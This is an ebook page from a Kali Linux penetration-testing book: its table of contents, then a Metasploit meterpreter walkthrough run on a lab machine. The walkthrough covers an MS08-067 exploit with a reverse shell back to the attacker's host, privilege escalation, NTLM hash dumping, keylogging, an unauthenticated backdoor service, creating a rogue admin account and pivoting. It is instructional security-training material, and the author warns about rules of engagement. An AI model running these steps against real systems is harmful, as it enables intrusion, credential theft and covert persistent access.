Table of Contents for
Kali Linux 2018: Assuring Security by Penetration Testing - Fourth Edition

Version ebook / Retour

Cover image for bash Cookbook, 2nd Edition Kali Linux 2018: Assuring Security by Penetration Testing - Fourth Edition by Shakeel Ali Published by Packt Publishing, 2018
  1. Kali Linux Assuring Security by Penetration Testing, Fourth Edition
  2. Title Page
  3. Copyright and Credits
  4. Kali Linux 2018: Assuring Security by Penetration Testing Fourth Edition
  5. Dedication
  6. Packt Upsell
  7. Why subscribe?
  8. Packt.com
  9. Contributors
  10. About the authors
  11. About the reviewers
  12. Packt is searching for authors like you
  13. Table of Contents
  14. Preface
  15. Who this book is for
  16. What this book covers
  17. To get the most out of this book
  18. Conventions used
  19. Get in touch
  20. Reviews
  21. Installing and Configuring Kali Linux
  22. Technical requirements
  23. Kali Linux tool categories
  24. Downloading Kali Linux
  25. Using Kali Linux
  26. Running Kali using a Live DVD
  27. Installing on a hard disk
  28. Installing Kali on a physical machine
  29. Installing Kali on a virtual machine
  30. Installing Kali on a virtual machine from the ISO image
  31. Installing Kali Linux on a virtual machine using the Kali Linux VM image provided
  32. Saving or moving the virtual machine
  33. Installing Kali on a USB disk
  34. Configuring the virtual machine
  35. VirtualBox guest additions
  36. Setting up networking
  37. Setting up a wired connection
  38. Setting up a wireless connection
  39. Updating Kali Linux
  40. Setting up Kali Linux AMI on Amazon AWS Cloud
  41. Summary
  42. Questions
  43. Further reading
  44. Setting Up Your Test Lab
  45. Technical requirements
  46. Physical or virtual?
  47. Setting up a Windows environment in a VM
  48. Installing vulnerable servers
  49. Setting up Metasploitable 2 in a VM
  50. Setting up Metasploitable 3 in a VM
  51. Installing Packer
  52. Installing Vagrant
  53. Pre-built Metasploit 3
  54. Setting up BadStore in a VM
  55. Installing additional tools in Kali Linux
  56. Network services in Kali Linux
  57. HTTP
  58. MySQL
  59. SSH
  60. Additional labs and resources
  61. Summary
  62. Questions
  63. Further reading
  64. Penetration Testing Methodology
  65. Technical requirements
  66. Penetration testing methodology
  67. OWASP testing guide
  68. PCI penetration testing guide
  69. Penetration Testing Execution Standard
  70. NIST 800-115
  71. Open Source Security Testing Methodology Manual 
  72. General penetration testing framework
  73. Reconnaissance
  74. Scanning and enumeration
  75. Scanning
  76. ARP scanning
  77. The network mapper (Nmap)
  78. Nmap port scanner/TCP scan
  79. Nmap half-open/stealth scan
  80. Nmap OS-detection
  81. Nmap service-detection
  82. Nmap ping sweeps
  83. Enumeration
  84. SMB shares
  85. DNS zone transfer
  86. DNSRecon
  87. SNMP devices
  88. Packet captures
  89. tcpdump
  90. Wireshark
  91. Gaining access
  92. Exploits
  93. Exploits for Linux
  94. Exploits for Windows
  95. Escalating privileges
  96. Maintaining access
  97. Covering your tracks
  98. Reporting
  99. Summary
  100. Footprinting and Information Gathering
  101. Open Source Intelligence
  102. Using public resources
  103. Querying the domain registration information
  104. Analyzing the DNS records
  105. Host
  106. dig
  107. DMitry
  108. Maltego
  109. Getting network routing information
  110. tcptraceroute
  111. tctrace
  112. Utilizing the search engine
  113. SimplyEmail
  114. Google Hacking Database (GHDB)
  115. Metagoofil
  116. Automated footprinting and information gathering tools
  117. Devploit
  118. Red Hawk v2
  119. Using Shodan to find internet connected devices
  120. Search queries in Shodan
  121. Blue-Thunder-IP-Locator
  122. Summary
  123. Questions
  124. Further reading
  125. Scanning and Evasion Techniques
  126. Technical requirements
  127. Starting off with target discovery
  128. Identifying the target machine
  129. ping
  130. fping
  131. hping3
  132. OS fingerprinting
  133. p0f
  134. Introducing port scanning
  135. Understanding TCP/IP protocol
  136. Understanding TCP and UDP message formats
  137. The network scanner
  138. Nmap
  139. Nmap target specification
  140. Nmap TCP scan options
  141. Nmap UDP scan options
  142. Nmap port specification
  143. Nmap output options
  144. Nmap timing options
  145. Useful Nmap options
  146. Service version detection
  147. Operating system detection
  148. Disabling host discovery
  149. Aggressive scan
  150. Nmap for scanning the IPv6 target
  151. The Nmap scripting engine
  152. Nmap options for firewall/IDS evasion
  153. Scanning with Netdiscover
  154. Automated scanning with Striker
  155. Anonymity using Nipe
  156. Summary
  157. Questions
  158. Further Reading
  159. Vulnerability Scanning
  160. Technical requirements
  161. Types of vulnerabilities
  162. Local vulnerability
  163. Remote vulnerability
  164. Vulnerability taxonomy
  165. Automated vulnerability scanning
  166. Vulnerability scanning with Nessus 7
  167. Installing the Nessus vulnerability scanner
  168. Vulnerability scanning with OpenVAS
  169. Linux vulnerability scanning with Lynis
  170. Vulnerability scanning and enumeration using SPARTA
  171. Summary
  172. Questions
  173. Further reading
  174. Social Engineering
  175. Technical requirements
  176. Modeling human psychology
  177. Attack process
  178. Attack methods
  179. Impersonation
  180. Reciprocation
  181. Influential authority
  182. Scarcity
  183. Social relationships
  184. Curiosity
  185. Social Engineering Toolkit
  186. Anonymous USB attack
  187. Credential-harvesting
  188. Malicious Java applet
  189. Summary
  190. Target Exploitation
  191. Vulnerability research
  192. Vulnerability and exploit repositories
  193. Advanced exploitation toolkit
  194. MSFConsole
  195. MSFCLI
  196. Ninja 101 drills
  197. Scenario 1
  198. Scenario 2
  199. SMB usernames
  200. VNC blank authentication scanners
  201. PostGRESQL logins
  202. Scenario 3
  203. Bind shells
  204. Reverse shells
  205. Meterpreters
  206. Writing exploit modules
  207. Summary
  208. Privilege Escalation and Maintaining Access
  209. Technical requirements
  210. Privilege-escalation
  211. Local escalation
  212. Password-attack tools
  213. Offline attack tools
  214. John the Ripper
  215. Ophcrack
  216. samdump2
  217. Online attack tools
  218. CeWL
  219. Hydra
  220. Mimikatz
  221. Maintaining access
  222. Operating-system backdoors
  223. Cymothoa
  224. The Meterpreter backdoor
  225. Summary
  226. Web Application Testing
  227. Technical requirements
  228. Web analysis
  229. Nikto
  230. OWASP ZAP
  231. Burp Suite
  232. Paros proxy
  233. W3AF
  234. WebScarab
  235. Cross-Site Scripting
  236. Testing for XSS
  237. SQL injection
  238. Manual SQL injection
  239. Automated SQL injection
  240. sqlmap
  241. Command-execution, directory-traversal, and file-inclusion
  242. Directory-traversal and file-inclusion
  243. Command execution
  244. Summary
  245. Further reading
  246. Wireless Penetration Testing
  247. Technical requirements
  248. Wireless networking
  249. Overview of 802.11
  250. The Wired Equivalent Privacy standard
  251. Wi-Fi Protected Access (WPA)
  252. Wireless network reconnaissance
  253. Antennas
  254. Iwlist
  255. Kismet
  256. WAIDPS
  257. Wireless testing tools
  258. Aircrack-ng
  259. WPA pre-shared key-cracking
  260. WEP-cracking
  261. PixieWPS
  262. Wifite
  263. Fern Wifi-Cracker
  264. Evil Twin attack
  265. Post cracking
  266. MAC-spoofing
  267. Persistence
  268. Sniffing wireless traffic
  269. Sniffing WLAN traffic
  270. Passive sniffing
  271. Summary
  272. Mobile Penetration Testing with Kali NetHunter
  273. Technical requirements
  274. Kali NetHunter
  275. Deployment
  276. Network deployment
  277. Wireless deployment
  278. Host deployment
  279. Installing Kali NetHunter
  280. NetHunter icons
  281. NetHunter tools
  282. Nmap
  283. Metasploit
  284. MAC changer
  285. Third-party Android applications
  286. The NetHunter Terminal Application
  287. DriveDroid
  288. USB Keyboard
  289. Shodan
  290. Router Keygen
  291. cSploit
  292. Wireless attacks
  293. Wireless scanning
  294. WPA/WPA2 cracking
  295. WPS cracking
  296. Evil AP attack
  297. Mana evil AP
  298. HID attacks
  299. DuckHunter HID attacks
  300. Summary
  301. Questions
  302. Further reading
  303. PCI DSS Scanning and Penetration Testing
  304. PCI DSS v3.2.1 requirement 11.3
  305. Scoping the PCI DSS penetration test
  306. Gathering client requirements
  307. Creating the customer requirements form
  308. Preparing the test plan
  309. The test plan checklist
  310. Profiling test boundaries
  311. Defining business objectives
  312. Project management and scheduling
  313. Tools for executing the PCI DSS penetration test
  314. Summary
  315. Questions
  316. Further reading
  317. Tools for Penetration Testing Reporting
  318. Technical requirements
  319. Documentation and results verification
  320. Types of reports
  321. The executive report
  322. The management report
  323. The technical report
  324. Network penetration testing report
  325. Preparing your presentation
  326. Post-testing procedures
  327. Using the Dradis framework for penetration testing reporting
  328. Penetration testing reporting tools
  329. Faraday IDE
  330. MagicTree
  331. Summary
  332. Questions
  333. Further reading
  334. Assessments
  335. Chapter 1 – Assessment answers
  336. Chapter 2 – Assessment answers
  337. Chapter 4 – Assessment answers
  338. Chapter 5 – Assessment answers
  339. Chapter 6 – Assessment answers
  340. Chapter 12 – Assessment answers
  341. Chapter 13 – Assessment answers
  342. Chapter 14 – Assessment answers
  343. Other Books You May Enjoy
  344. Leave a review - let other readers know what you think

Meterpreters

A meterpreter is an advanced, stealthy, multifaceted, and dynamically-extensible payload that operates by injecting a reflective DLL into a target memory. Scripts and plugins can be dynamically loaded at runtime for the purpose of extending the post exploitation activity. This includes privilege-escalation, dumping system accounts, keylogging, persistent backdoor service, and enabling a remote desktop. Moreover, the whole communication of the meterpreter shell is encrypted by default.

The following are the commands to begin exploitation and set up a meterpreter payload:

    msf> use exploit/windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
    RHOST => 192.168.0.7
    msf exploit(ms08_067_netapi) > show payloads
    ...
    msf exploit(ms08_067_netapi) > set PAYLOAD 
windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(ms08_067_netapi) > show options
    ...
    msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3
    LHOST => 192.168.0.3
    msf exploit(ms08_067_netapi) > exploit
    
    [*] Started reverse handler on 192.168.0.3:4444
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Attempting to trigger the vulnerability...
    [*] Sending stage (749056 bytes) to 192.168.0.7
    [*] Meterpreter session 1 opened (192.168.0.3:4444 ->
192.168.0.7:1029) at Sun Nov 14 02:44:26 +0000 2010
    meterpreter> help
    ...

As you can see, we have successfully acquired a meterpreter shell. By typing, we will be able to see the various types of commands available to us. Let's check our current privileges and escalate them to SYSTEM level using a meterpreter script named getsystem:

    meterpreter>getuid
    Server username: CUSTDESKsalesdept
    meterpreter> use priv
    meterpreter>getsystem -h
    ...

This will display the number of techniques available for elevating our privileges. By using a default command, getsystem, without any options, it will attempt every single technique against the target and will stop as soon as it is successful:

    meterpreter>getsystem
    ...got system (via technique 1).
    meterpreter>getuid
    Server username: NT AUTHORITYSYSTEM
    meterpreter>sysinfo
    Computer: CUSTDESK
    OS      : Windows XP (Build 2600, Service Pack 2).
    Arch    : x86
    Language: en_US

If you choose to execute the -j -z exploit command, you are pushing the exploit execution to the background, and will not be presented with an interactive meterpreter shell. However, if the session has been established successfully, then you can interact with that particular session using the sessions -i ID or get a list of the active session's by typing sessions -l to get the exact ID value.

Let's use the power of the meterpreter shell and dump the current system accounts and passwords held by the target. These will be displayed in the NTLM hash format and can be reversed by cracking through several tools and techniques using the following commands:

    meterpreter> run hashdump
    [*] Obtaining the boot key...
    [*] Calculating the hboot key using SYSKEY 71e52ce6b86e5da0c213566a1236f892...
    [*] Obtaining the user list and keys...
    [*] Decrypting user keys...
    [*] Dumping password hashes...
    h
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    HelpAssistant:1000:d2cd5d550e14593b12787245127c866d:d3e35f657c924d0b31eb811d2d986df9:::
    SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c8edf0d0db48cbf7b2835ec013cfb9c5:::
    Momin Desktop:1003:ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204beb12283678:::
    IUSR_MOMINDESK:1004:a751dcb6ea9323026eb8f7854da74a24:b0196523134dd9a21bf6b80e02744513:::
    ASPNET:1005:ad785822109dd077027175f3382059fd:21ff86d627bcf380a5b1b6abe5d8e1dd:::
    IWAM_MOMINDESK:1009:12a75a1d0cf47cd0c8e2f82a92190b42:c74966d83d519ba41e5196e00f94e113:::
    h4x:1010:ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204beb12283678:::
    salesdept:1011:8f51551614ded19365b226f9bfc33fab:7ad83174aadb77faac126fdd377b1693:::

Now, let's take this activity further by recording the keystrokes using the keylogging capability of the meterpreter shell, using the following commands, which may reveal some useful data from our target:

    meterpreter>getuid
    Server username: NT AUTHORITYSYSTEM
    meterpreter>ps
    Process list
    ============
    
     PID   Name              Arch  Session  User                          
Path
     ---   ----              ----  -------  ----                          
----
     0     [System Process]
     4     System            x86   0        NT AUTHORITYSYSTEM
     384   smss.exe          x86   0        NT AUTHORITYSYSTEM           
SystemRootSystem32smss.exe
     488   csrss.exe         x86   0        NT AUTHORITYSYSTEM           
??C:WINDOWSsystem32csrss.exe
     648   winlogon.exe      x86   0        NT AUTHORITYSYSTEM           
??C:WINDOWSsystem32winlogon.exe
     692   services.exe      x86   0        NT AUTHORITYSYSTEM           
C:WINDOWSsystem32services.exe
     704   lsass.exe         x86   0        NT AUTHORITYSYSTEM           
C:WINDOWSsystem32lsass.exe
    ...
    148   alg.exe           x86   0        NT AUTHORITYLOCAL SERVICE    
C:WINDOWSSystem32alg.exe
    3172  explorer.exe      x86   0        CUSTDESKsalesdept
C:WINDOWSExplorer.EXE
    3236  reader_sl.exe     x86   0        CUSTDESKsalesdept
C:Program FilesAdobeReader 9.0ReaderReader_sl.exe

At this stage, we will migrate the meterpreter shell to the explorer.exe process (3172) in order to start logging the current user activity on a system with the following commands:

    meterpreter> migrate 3172
    [*] Migrating to 3172...
    [*] Migration completed successfully.
    meterpreter>getuid
    Server username: CUSTDESKsalesdept
    meterpreter>keyscan_start
    Starting the keystroke sniffer...

We have now started our keylogger and should wait for some time to get the chunks of recorded data:

    meterpreter>keyscan_dump
    Dumping captured keystrokes...
    <Return> www.yahoo.com <Return><Back> www.bbc.co.uk <Return>
    meterpreter>keyscan_stop
    Stopping the keystroke sniffer...

As you can see, we have dumped the target's web-surfing activity. Similarly, we could also capture the credentials of all users logging into the system by migrating the winlogon.exe process (648).

You have exploited and gained access to the target system, but now want to keep this access permanent, even if the exploited service or application will be patched at a later stage. This kind of activity is typically known as a backdoor service. Note that the backdoor service provided by the meterpreter shell does not require authentication before accessing a particular network port on the target system. This may allow some uninvited guests to access your target and pose a significant risk. As part of following the rules of engagement for penetration testing, such an activity is generally not allowed. Therefore, we strongly suggest you keep the backdoor service away from an official pentest environment. You should also ensure that this was explicitly permitted in writing during the scoping and rules-of-engagement phases:

    msf exploit(ms08_067_netapi) > exploit
    [*] Started reverse handler on 192.168.0.3:4444
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Attempting to trigger the vulnerability...
    [*] Sending stage (749056 bytes) to 192.168.0.7
    [*] Meterpreter session 1 opened (192.168.0.3:4444 ->
192.168.0.7:1032) at Tue Nov 16 19:21:39 +0000 2010
    meterpreter>ps
    ...
     292   alg.exe           x86   0        NT AUTHORITYLOCAL SERVICE    
C:WINDOWSSystem32alg.exe
    1840  csrss.exe         x86   2        NT AUTHORITYSYSTEM           
??C:WINDOWSsystem32csrss.exe
     528   winlogon.exe      x86   2        NT AUTHORITYSYSTEM           
??C:WINDOWSsystem32winlogon.exe
     240   rdpclip.exe       x86   0        CUSTDESKMomin Desktop        
C:WINDOWSsystem32rdpclip.exe
    1060  userinit.exe      x86   0        CUSTDESKMomin Desktop        
C:WINDOWSsystem32userinit.exe
    1544  explorer.exe      x86   0        CUSTDESKMomin Desktop        
C:WINDOWSExplorer.EXE
    ...
    meterpreter> migrate 1544
    [*] Migrating to 1544...
    [*] Migration completed successfully.
    meterpreter> run metsvc -h
    ...
    meterpreter> run metsvc
    [*] Creating a meterpreter service on port 31337
    [*] Creating a temporary installation directory 
C:DOCUME~1MOMIND~1LOCALS~1TempoNyLOPeS...
    [*]  >> Uploading metsrv.dll...
    [*]  >> Uploading metsvc-server.exe...
    [*]  >> Uploading metsvc.exe...
    [*] Starting the service...
             * Installing service metsvc
     * Starting service
    Service metsvc successfully installed.

So, we have finally started the backdoor service on our target. We will close the current meterpreter session and use the multi/handler with a windows/metsvc_bind_tcp payload to interact with our backdoor service whenever we want:

   
   meterpreter> exit
 [*] Meterpreter session 1 closed. Reason: User exit msf exploit(ms08_067_netapi) > back msf> use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp PAYLOAD => windows/metsvc_bind_tcp msf exploit(handler) > set LPORT 31337 LPORT => 31337 msf exploit(handler) > set RHOST 192.168.0.7 RHOST => 192.168.0.7 msf exploit(handler) > exploit [*] Starting the payload handler... [*] Started bind handler [*] Meterpreter session 2 opened (192.168.0.3:37251 ->
192.168.0.7:31337) at Tue Nov 16 20:02:05 +0000 2010 meterpreter>getuid Server username: NT AUTHORITYSYSTEM

Let's use another useful meterpreter script, getgui, to enable remote desktop access for our target. The following exercise will create a new user account on the target and enable remote desktop service if it was disabled previously:

    meterpreter> run getgui -u btuser -p btpass
    [*] Windows Remote Desktop Configuration Meterpreter Script by 
Darkoperator
    [*] Carlos Perez carlos_perez@darkoperator.com
    [*] Language set by user to: 'en_EN'
    [*] Setting user account for logon
    [*]     Adding User: btuser with Password: btpass
    [*]     Adding User: btuser to local group 'Remote Desktop Users'
    [*]     Adding User: btuser to local group 'Administrators'
    [*] You can now login with the created user
    [*] For cleanup use command: run multi_console_command -rc
/root/.msf3/logs/scripts/getgui/clean_up__20101116.3447.rc

Now, we can log into our target system using the rdesktop program by entering the following command on another Terminal:

    # rdesktop 192.168.0.7:3389

Note that, if you already hold a cracked password for any existing user on the target machine, you can simply execute the run getgui -e command to enable the remote desktop service, instead of adding a new user. Additionally, don't forget to clean up your tracks on the system by executing the getgui/clean_up script cited at the end of the previous output.

How should I extend my attack landscape by gaining deeper access to the targeted network that is inaccessible from the outside? Metasploit provides the capability to view and add new routes to the destination network using the route add targetSubnettargetSubnetMaskSessionId command (for example, route add 10.2.4.0 255.255.255.0 1). Here, the SessionId parameter points to the existing meterpreter session (gateway), and the targetsubnet parameter is another network address (or dual-homed Ethernet network address) that resides beyond our compromised target. Once you set Metasploit to route all of the traffic through a compromised host session, we are ready to penetrate further into a network that is normally non-routable from our side. This is commonly known as pivoting or foot-holding.